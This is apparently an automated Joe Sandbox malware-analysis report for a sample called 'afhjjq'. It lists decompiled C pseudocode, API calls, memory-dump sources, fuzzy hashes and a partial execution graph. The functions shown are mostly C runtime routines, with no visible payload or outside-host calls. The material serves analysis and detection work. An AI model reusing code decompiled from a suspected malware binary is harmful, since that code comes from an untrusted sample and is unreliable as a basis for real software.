                            • Opcode ID: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction ID: fd63e98e6d297a92027ca4b481c7d7d551dc6c967760522bfe12cd789a5f2b6e
                            • Opcode Fuzzy Hash: dc96b0040fa0f0c9fad60ba0d7235aa29d4ae7318c37b4e58f64ef8a376baa9d
                            • Instruction Fuzzy Hash: AF21BFB4801218DFD779EF69E4466583BECFB08B45F60501AF5098B348E7B4A981CF89
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01324954 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01324954() {

				SetUnhandledExceptionFilter(E01324912);
				return 0;
			}



                            0x01324959
                            0x01324961

                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(Function_00004912), ref: 01324959
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: b80f08af4eda5e0d5d839e525ca09242781d8fb5c476e47bc1d65edbb43a7bb5
                            • Instruction ID: 2a138580942b227d0fc1e0d469d4f49f6eb92877b4ac9c2b0e182974de1e1ee6
                            • Opcode Fuzzy Hash: b80f08af4eda5e0d5d839e525ca09242781d8fb5c476e47bc1d65edbb43a7bb5
                            • Instruction Fuzzy Hash: A19002B036111046DA243B71580B60925985E48E56B52546CE205D8108DA9451406A51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B12AAB Relevance: .1, Instructions: 60COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                            • Instruction ID: 8a9c0e4c2540879810bc0d0875f1eb3e17d96f734ee34198fe7c183291557bc9
                            • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                            • Instruction Fuzzy Hash: CC11C232610129AFD720DF79C8809AAB7E8EF546A47808065FC55CB200E334DD41C7A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B12A6E Relevance: .0, Instructions: 26COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                            • Instruction ID: ab313be9f3194a6e86e31eba2fb00cce8c763d97d8fc4f0d41ecb8fe604ae42a
                            • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                            • Instruction Fuzzy Hash: 86E01A35664659AFEB54CBA8CD81D6AB3F8EB0D320B5442D0FD25C73A0E734EE00DA50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B12A39 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                            • Instruction ID: d452b8ae916db5cdd30fca7de91e48b1b57fc66bcd78766fe60a32c56154ad66
                            • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                            • Instruction Fuzzy Hash: ECE086332305609FD7319B59D900D96F7E9EF88BB0B8988A5ED5997660D330FC00CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 02B1298F Relevance: .0, Instructions: 7COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.318875769.0000000002B12000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B12000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_2b12000_afhjjq.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321000 Relevance: 12.1, APIs: 8, Instructions: 141stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01321000(void* __ebx, void* __ecx, void* __edi, void* __esi, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20) {
				intOrPtr _v8;

				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a20 == 0) {
					return 0x57;
				} else {
					_v8 = E0132141A(_a4, 0x5c);
					if(_v8 == 0) {
						_v8 = E01321559(_a4, 0x40);
						if(_v8 == 0) {
							if(lstrlenW(_a4) <= _a12 - 1) {
								lstrcpyW(_a8, _a4);
								 *_a16 = 0;
								return 0;
							}
							return 0x7a;
						}
						if(_v8 + 2 - _a4 >> 1 <= _a12 - 1) {
							if(lstrlenW(_v8 + 2) <= _a20 - 1) {
								lstrcpyW(_a16, _v8 + 2);
								E01327760(__ebx, __edi, __esi, _a8, _a4, _v8 - _a4 >> 1 << 1);
								_a8[_v8 - _a4 >> 1] = 0;
								return 0;
							}
							return 0x7a;
						}
						return 0x7a;
					}
					if(_v8 - _a4 >> 1 <= _a20 - 1) {
						if(lstrlenW(_v8 + 2) <= _a12 - 1) {
							lstrcpyW(_a8, _v8 + 2);
							E01327760(__ebx, __edi, __esi, _a16, _a4, _v8 - _a4 >> 1 << 1);
							_a16[_v8 - _a4 >> 1] = 0;
							return 0;
						}
						return 0x7a;
					}
					return 0x7a;
				}
			}




                            0x01321008
                            0x00000000
                            0x0132102c
                            0x0132103a
                            0x01321041
                            0x013210d6
                            0x013210dd
                            0x0132116f
                            0x01321180
                            0x0132118b
                            0x00000000
                            0x0132118e
                            0x00000000
                            0x01321171
                            0x013210f2
                            0x01321113
                            0x01321127
                            0x01321140
                            0x01321155
                            0x00000000
                            0x01321159
                            0x00000000
                            0x01321115
                            0x00000000
                            0x013210f4
                            0x01321057
                            0x01321078
                            0x0132108f
                            0x013210a8
                            0x013210bd
                            0x00000000
                            0x013210c1
                            0x00000000
                            0x0132107a
                            0x00000000
                            0x01321059

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: lstrcpylstrlen$_wcschr_wcsrchr
                            • String ID:
                            • API String ID: 2287690931-0
                            • Opcode ID: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction ID: ef007f0316f0161483825e7800360616755226c5e25d87c88738d12933986736
                            • Opcode Fuzzy Hash: c269b97b9905f15a49733a8c35e577445ffbc74541814b88d2834e78245f9eb7
                            • Instruction Fuzzy Hash: 30516371A00118EFCB24EF6CCA84BAE77B9EF84345F14C618F91A97344D634EA50CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132567D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 45%
                            			E0132567D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x132d5f8);
				_t8 = E01322A5C(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E01322AA1(_t8);
				}
				if( *0x1331cbc != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x1330264, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E013231DA(_t32);
						 *_t10 = E01323198(GetLastError());
					}
					goto L9;
				}
				E01321F64(__ebx, __edx, __edi, 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E01321F97(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E01321FC7();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E013256D3();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                            0x0132567d
                            0x0132567f
                            0x01325684
                            0x01325689
                            0x0132568e
                            0x01325705
                            0x0132570a
                            0x0132570a
                            0x01325697
                            0x013256dc
                            0x013256dd
                            0x013256e5
                            0x013256eb
                            0x013256ed
                            0x013256ef
                            0x01325702
                            0x01325704
                            0x00000000
                            0x013256ed
                            0x0132569b
                            0x013256a1
                            0x013256a6
                            0x013256ac
                            0x013256b1
                            0x013256b3
                            0x013256b4
                            0x013256b5
                            0x013256bb
                            0x013256bc
                            0x013256c3
                            0x013256cc
                            0x00000000
                            0x013256ce
                            0x013256ce
                            0x00000000
                            0x013256ce

                            APIs
                            • __lock.LIBCMT ref: 0132569B
                              • Part of subcall function 01321F64: __mtinitlocknum.LIBCMT ref: 01321F7A
                              • Part of subcall function 01321F64: __amsg_exit.LIBCMT ref: 01321F86
                              • Part of subcall function 01321F64: EnterCriticalSection.KERNEL32(0132122A,0132122A,?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001), ref: 01321F8E
                            • ___sbh_find_block.LIBCMT ref: 013256A6
                            • ___sbh_free_block.LIBCMT ref: 013256B5
                            • HeapFree.KERNEL32(00000000,?,0132D5F8,0000000C,01321F45,00000000,0132D4A0,0000000C,01321F7F,?,0132122A,?,0132904E,00000004,0132D7E0,0000000C), ref: 013256E5
                            • GetLastError.KERNEL32(?,0132904E,00000004,0132D7E0,0000000C,01325766,?,01321239,00000000,00000000,00000000,?,01325254,00000001,00000214), ref: 013256F6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                            • String ID: Uhv
                            • API String ID: 2714421763-4282624479
                            • Opcode ID: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction ID: dd4315922994e3233120f3946ed9c20b540e9c94b40c428a95199ed5241f7cb0
                            • Opcode Fuzzy Hash: 3359487bdfba264b96f7fd2c8edc14d3dc2089593cca1d619f8ec75c3573d693
                            • Instruction Fuzzy Hash: C3016771945336EAEB307F799C05B9E3BB8AF11768F205508E510A6080DB38D6408B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013287EB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 89%
                            			E013287EB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x132d780);
				E01322A5C(__ebx, __edi, __esi);
				_t31 = E013252A2(__ebx, _t35);
				_t15 =  *0x132fd9c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E01321F64(_t25, _t29, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x132fba8; // 0x2b11610
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x132f780;
								if(__eflags != 0) {
									_push(_t33);
									E0132567D(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x132fba8; // 0x2b11610
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x132fba8; // 0x2b11610
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E01328886();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E01322CAC(_t29, 0x20);
				}
				return E01322AA1(_t33);
			}











                            0x013287eb
                            0x013287eb
                            0x013287eb
                            0x013287eb
                            0x013287ed
                            0x013287f2
                            0x013287fc
                            0x013287fe
                            0x01328806
                            0x01328827
                            0x0132882d
                            0x01328831
                            0x01328834
                            0x01328837
                            0x0132883d
                            0x0132883f
                            0x01328841
                            0x01328844
                            0x0132884a
                            0x0132884c
                            0x0132884e
                            0x01328854
                            0x01328856
                            0x01328857
                            0x0132885c
                            0x01328854
                            0x0132884c
                            0x0132885d
                            0x01328862
                            0x01328865
                            0x0132886b
                            0x0132886f
                            0x0132886f
                            0x01328875
                            0x0132887c
                            0x0132880e
                            0x0132880e
                            0x0132880e
                            0x01328813
                            0x01328817
                            0x0132881c
                            0x01328824

                            APIs
                            • __getptd.LIBCMT ref: 013287F7
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __amsg_exit.LIBCMT ref: 01328817
                            • __lock.LIBCMT ref: 01328827
                            • InterlockedDecrement.KERNEL32(?), ref: 01328844
                            • InterlockedIncrement.KERNEL32(02B11610), ref: 0132886F
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                            • String ID:
                            • API String ID: 4271482742-0
                            • Opcode ID: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction ID: 494ec1cdcd8f8986daad00a11c73874ee2ecdee88d868881a6432ae855148e52
                            • Opcode Fuzzy Hash: 9b991770f953512e2b516849efd538229dc8a10faf15c4d8451a18d4ed7c61a7
                            • Instruction Fuzzy Hash: 70018031901632ABEB31BFADB404B5E7FF8BF05B28F154159E910A7684CB78A941CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01329F35 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E01329F35(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t74;

				_t74 = _a8;
				if(_t74 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t74 != 0) {
						E01326D18( &_v20, __edx, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0132A066( *_t74 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E013231DA(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t74[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t74 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                            0x01329f3f
                            0x01329f46
                            0x01329f5d
                            0x00000000
                            0x01329f4d
                            0x01329f4f
                            0x01329f69
                            0x01329f6e
                            0x01329f71
                            0x01329f74
                            0x01329f9d
                            0x01329fa4
                            0x01329fa6
                            0x0132a027
                            0x0132a039
                            0x0132a042
                            0x0132a044
                            0x01329f84
                            0x01329f84
                            0x01329f87
                            0x01329f89
                            0x01329f8c
                            0x01329f8c
                            0x01329f8c
                            0x01329f8c
                            0x00000000
                            0x01329f92
                            0x0132a006
                            0x0132a006
                            0x0132a00b
                            0x0132a011
                            0x0132a014
                            0x0132a016
                            0x0132a019
                            0x0132a019
                            0x0132a019
                            0x0132a019
                            0x00000000
                            0x0132a01d
                            0x01329fa8
                            0x01329fab
                            0x01329fab
                            0x01329fb1
                            0x01329fb4
                            0x01329fdb
                            0x01329fde
                            0x01329fde
                            0x01329fe4
                            0x00000000
                            0x00000000
                            0x01329fe6
                            0x01329fe9
                            0x00000000
                            0x00000000
                            0x01329feb
                            0x01329feb
                            0x01329feb
                            0x01329ff1
                            0x01329ff4
                            0x01329f62
                            0x01329f62
                            0x01329ffd
                            0x00000000
                            0x01329ffd
                            0x01329fb6
                            0x01329fb9
                            0x00000000
                            0x00000000
                            0x01329fbd
                            0x01329fcb
                            0x01329fce
                            0x01329fd4
                            0x01329fd6
                            0x01329fd9
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01329fd9
                            0x01329f76
                            0x01329f79
                            0x01329f7b
                            0x01329f81
                            0x01329f81
                            0x00000000
                            0x01329f51
                            0x01329f51
                            0x01329f56
                            0x01329f5a
                            0x01329f5a
                            0x00000000
                            0x01329f56
                            0x01329f4f

                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 01329F69
                            • __isleadbyte_l.LIBCMT ref: 01329F9D
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 01329FCE
                            • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,01326B14,00000109,00BFBBEF,00000003), ref: 0132A03C
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction ID: 9925a9467550e1661e90385b3e113a8a5166dd9d538ce8a85aa80a7476eeecee
                            • Opcode Fuzzy Hash: 33dc651528c1ece6ae7a4d967a392ab653d860b8ad0da3af0d8c0720da7daad1
                            • Instruction Fuzzy Hash: EE31B231A0027AFFDB61EF68C880EAE3FB5FF0121AF1585A8E5698B191D730D944DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328F57 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E01328F57(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x132d7c0);
				E01322A5C(__ebx, __edi, __esi);
				_t29 = E013252A2(__ebx, _t31);
				_t13 =  *0x132fd9c; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E01321F64(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x132fd88; // 0x132fcb0
					 *((intOrPtr*)(_t30 - 0x1c)) = E01328F19(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E01328FC1();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E013252A2(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E01322CAC(_t25, 0x20);
				}
				return E01322AA1(_t29);
			}









                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f57
                            0x01328f59
                            0x01328f5e
                            0x01328f68
                            0x01328f6a
                            0x01328f72
                            0x01328f96
                            0x01328f98
                            0x01328f9e
                            0x01328fa2
                            0x01328fa5
                            0x01328fb0
                            0x01328fb3
                            0x01328fba
                            0x01328f74
                            0x01328f74
                            0x01328f78
                            0x00000000
                            0x01328f7a
                            0x01328f7f
                            0x01328f7f
                            0x01328f78
                            0x01328f84
                            0x01328f88
                            0x01328f8d
                            0x01328f95

                            APIs
                            • __getptd.LIBCMT ref: 01328F63
                              • Part of subcall function 013252A2: __getptd_noexit.LIBCMT ref: 013252A5
                              • Part of subcall function 013252A2: __amsg_exit.LIBCMT ref: 013252B2
                            • __getptd.LIBCMT ref: 01328F7A
                            • __amsg_exit.LIBCMT ref: 01328F88
                            • __lock.LIBCMT ref: 01328F98
                            Memory Dump Source
                            • Source File: 00000001.00000002.318826015.0000000001321000.00000020.00000001.01000000.00000004.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000001.00000002.318808862.0000000001320000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318837351.000000000132C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318845571.000000000132F000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.318862387.0000000001332000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1320000_afhjjq.jbxd
                            Similarity
                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                            • String ID:
                            • API String ID: 3521780317-0
                            • Opcode ID: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction ID: 15dc13205acd01c2ef1072c42dfd1425dea07b4c5d3191b0de69106abc66c636
                            • Opcode Fuzzy Hash: 07cd85fff6ff97c7e791815ad33fc259acbd5c246fbbd0ec5d21056f42e9ca6f
                            • Instruction Fuzzy Hash: 07F09031940736AFE730BFADA400F4E33F56F10728F144589D650A72D4CB349A05CB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:5.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:3.8%
                            Total number of Nodes:530
                            Total number of Limit Nodes:73
                            execution_graph 22386 41f0b0 22389 41b930 22386->22389 22390 41b956 22389->22390 22397 409d30 22390->22397 22392 41b962 22396 41b983 22392->22396 22405 40c1b0 22392->22405 22394 41b975 22441 41a670 22394->22441 22398 409d3d 22397->22398 22444 409c80 22397->22444 22400 409d44 22398->22400 22456 409c20 22398->22456 22400->22392 22406 40c1d5 22405->22406 22858 40b1b0 22406->22858 22408 40c22c 22862 40ae30 22408->22862 22410 40c4a3 22410->22394 22411 40c252 22411->22410 22871 414390 22411->22871 22413 40c297 22413->22410 22874 408a60 22413->22874 22415 40c2db 22415->22410 22881 41a4c0 22415->22881 22419 40c331 22420 40c338 22419->22420 22891 419fd0 22419->22891 22421 41bd80 2 API calls 22420->22421 22424 40c345 22421->22424 22424->22394 22425 40c382 22426 41bd80 2 API calls 22425->22426 22427 40c389 22426->22427 22427->22394 22428 40c392 22429 40f490 LdrLoadDll 22428->22429 22430 40c406 22429->22430 22430->22420 22431 40c411 22430->22431 22432 41bd80 2 API calls 22431->22432 22433 40c435 22432->22433 22894 41a020 22433->22894 22436 419fd0 LdrLoadDll 22437 40c470 22436->22437 22437->22410 22897 419de0 22437->22897 22440 41a670 2 API calls 22440->22410 22442 41a68f ExitProcess 22441->22442 22443 41af20 LdrLoadDll 22441->22443 22443->22442 22445 409c93 22444->22445 22495 418b80 LdrLoadDll 22444->22495 22475 418a30 22445->22475 22448 409ca6 22448->22398 22449 409c9c 22449->22448 22478 41b270 22449->22478 22451 409ce3 22451->22448 22489 409aa0 22451->22489 22453 409d03 22496 409620 LdrLoadDll 22453->22496 22455 409d15 22455->22398 22836 41b560 22456->22836 22459 41b560 LdrLoadDll 22460 409c4b 22459->22460 22461 41b560 LdrLoadDll 22460->22461 22462 409c61 22461->22462 22463 40f170 22462->22463 22464 40f189 22463->22464 22844 40b030 22464->22844 22466 40f19c 22848 41a1a0 